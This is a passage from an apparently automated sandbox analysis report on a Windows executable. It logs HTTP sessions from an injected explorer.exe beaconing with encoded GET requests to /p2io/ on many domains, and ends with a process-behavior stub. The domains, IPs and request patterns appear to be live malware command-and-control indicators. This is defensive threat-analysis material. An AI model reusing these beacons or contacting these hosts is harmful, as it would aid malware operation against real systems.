                                                                                          Content-Length: 153
                                                                                          Connection: close
                                                                                          Server: nginx/1.16.1
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          2192.168.2.34974278.31.67.9180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:13:48.962518930 CEST1346OUTGET /p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8 HTTP/1.1
                                                                                          Host: www.cleanxcare.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:13:49.018184900 CEST1358INHTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 707
                                                                                          Date: Thu, 10 Jun 2021 17:13:48 GMT
                                                                                          Location: https://www.cleanxcare.com/p2io/?-Z0xlN=pxlxKDN0Rvw8YUTnsB4Bv4ohCC0AYWvU81fxb+r9dLiNjjqdMXiyL1Lf04YhWug+Cxzy&1bs8=cR-P8LD8
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          Vary: User-Agent
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          3192.168.2.349743184.168.131.24180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:13:54.289207935 CEST3846OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6 HTTP/1.1
                                                                                          Host: www.thriveglucose.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:13:54.504077911 CEST3846INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx/1.16.1
                                                                                          Date: Thu, 10 Jun 2021 17:13:54 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Location: https://glucoserevival.com/p2io/?1bs8=cR-P8LD8&-Z0xlN=bgEje2qoIMshrcRflwWQjpUULYzLZlDcA+elzyDX4pz+rZVwSlMQ2+HN9bOaKrviR/d6
                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          4192.168.2.34974523.227.38.7480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:13:59.639724970 CEST3877OUTGET /p2io/?-Z0xlN=tOwaJov1NmitprcRi3+vLu8KpTdHs2Vuljzq3uMGq4g841w++xy1kQ5hZRjCYd6IRkqR&1bs8=cR-P8LD8 HTTP/1.1
                                                                                          Host: www.essentiallyourscandles.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:13:59.731450081 CEST3879INHTTP/1.1 403 Forbidden
                                                                                          Date: Thu, 10 Jun 2021 17:13:59 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          X-Sorting-Hat-PodId: 149
                                                                                          X-Sorting-Hat-ShopId: 48654778518
                                                                                          X-Dc: gcp-europe-west1
                                                                                          X-Request-ID: 6bafc287-af0f-4d51-b75f-3e16de18de5f
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          X-Download-Options: noopen
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          cf-request-id: 0a9883ae7900004e49f792f000000001
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 65d43bc3fc284e49-FRA
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30
                                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          5192.168.2.349746212.32.237.9280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:14:04.896286964 CEST3887OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=2q6D4S4IYN7aWdcEo+dmfNOnFlWkohYFDzpy6Q1cDMIvB7dycn+zvuYm9OtfZIW5A7WG HTTP/1.1
                                                                                          Host: www.ololmychartlogin.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:14:05.727042913 CEST3896INHTTP/1.1 302 Found
                                                                                          cache-control: max-age=0, private, must-revalidate
                                                                                          connection: close
                                                                                          content-length: 11
                                                                                          date: Thu, 10 Jun 2021 17:14:04 GMT
                                                                                          location: http://survey-smiles.com
                                                                                          server: nginx
                                                                                          set-cookie: sid=423ab2aa-ca0f-11eb-b7d8-a9a95aee65c0; path=/; domain=.ololmychartlogin.com; expires=Tue, 28 Jun 2089 20:28:11 GMT; max-age=2147483647; HttpOnly
                                                                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                                                                                          Data Ascii: Redirecting


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          6192.168.2.349749199.195.117.14780C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:14:16.131238937 CEST3904OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=0YkKA47wwnQsSd2I7kPMKR9IRaKfA7HvmAjNs5nkCsbL4/Nj4Thso/t2FfIDpWXBn/Ha HTTP/1.1
                                                                                          Host: www.swayam-moj.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:14:16.283550024 CEST3904INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 10 Jun 2021 17:14:16 GMT
                                                                                          Server: Apache/2.4.48 (cPanel) OpenSSL/1.1.1k mod_bwlimited/1.4
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          7192.168.2.34975154.85.86.21180C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:14:21.535777092 CEST3914OUTGET /p2io/?-Z0xlN=OHUffbgtyxVuJk/N29fk0Sz2RAv4pH8VLsDTaDI27e1IsTBLt6kjVq3G5jK+CrAnEI1b&1bs8=cR-P8LD8 HTTP/1.1
                                                                                          Host: www.brunoecatarina.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:14:21.678721905 CEST3916INHTTP/1.1 200 OK
                                                                                          Date: Thu, 10 Jun 2021 17:14:21 GMT
                                                                                          Server: Apache
                                                                                          Set-Cookie: session=vgsqnj9v3anbm72u3kk8bh4oh4; path=/; domain=.brunoecatarina.com; secure; SameSite=None
                                                                                          Vary: Accept-Encoding,User-Agent
                                                                                          Connection: close
                                                                                          Transfer-Encoding: chunked
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Raw: 37 34 33 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 73 69 73 74 65 6d 61 2e 63 61 73 61 72 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 76 3d 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 43 61 73 61 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 4d 78 74 6d 44 57 69 41 4f 76 2d 53 75 34 7a 39 2d 73 55 41 79 4a 4a 4e 55 47 74 6c 68 79 56 42 4d 75 42 61 33 43 31 66 71 73 22 20 2f 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 6d 62 65 64 2e 74 79 70 65 66 6f 72 6d 2e 63 6f 6d 2f 65 6d 62 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 21 2d 2d 20 48 54 4d 4c 35 20 53 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 6d 65 64 69 61 20 71 75 65 72 69 65 73 20 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 30 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 72 65 73 70 6f 6e 64 2e 6a 73 2f 31 2e 33 2e 30 2f 72 65 73 70 6f 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 21 2d 2d 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 73 61 72 2e 63 6f 6d 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 31 33 35 32 38 33 37 39 35 37 37 33 36 22 2f 3e 0a 3c 21 2d 2d 20 65 6e 64 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 0a 0a 20 20 20 20 20 20 3c 21 2d 2d 20 67 6f 6f 67 6c 65 20 61 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74
                                                                                          Data Ascii: 7438<!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="//sistema.casar.com/favicon.ico?v=2" /><title>Pgina no encontrada | Casar.com</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="google-site-verification" content="GMxtmDWiAOv-Su4z9-sUAyJJNUGtlhyVBMuBa3C1fqs" /><script src="https://embed.typeform.com/embed.js"></script>... HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->...[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script><![endif]-->... open graph --> <meta property="og:site_name" content="Casar.com"/> <meta property="og:type" content="website"> <meta property="fb:app_id" content="621352837957736"/>... end open graph --> ... google analytics --><script> (function(i,s,o,g,r,a,m){i['GoogleAnalyt


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          8192.168.2.34975223.82.57.3280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Jun 10, 2021 19:14:27.322182894 CEST3946OUTGET /p2io/?1bs8=cR-P8LD8&-Z0xlN=WkKybY+EW+ZFcjRL6hKPcEEM/Z4gp4PnllRo5afgEdT4hrEaW59DTbMK1uLBueD84dbw HTTP/1.1
                                                                                          Host: www.ruhexuangou.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Jun 10, 2021 19:14:29.504343033 CEST3947INHTTP/1.1 200 OK
                                                                                          Server: Tengine
                                                                                          Date: Thu, 10 Jun 2021 17:14:27 GMT
                                                                                          Content-Type: text/html;charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 33 34 31 0d 0a 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 64 63 34 64 64 62 66 32 62 33 66 65 65 66 64 61 35 35 37 35 30 61 66 34 34 30 35 35 30 32 31 62 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 341<html><head><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?dc4ddbf2b3feefda55750af44055021b"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Start time:19:12:24
                                                                                          Start date:10/06/2021
                                                                                          Path:C:\Users\user\Desktop\DNPr7t0GMY.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:'C:\Users\user\Desktop\DNPr7t0GMY.exe'
                                                                                          Imagebase:0xf10000
                                                                                          File size:1325568 bytes
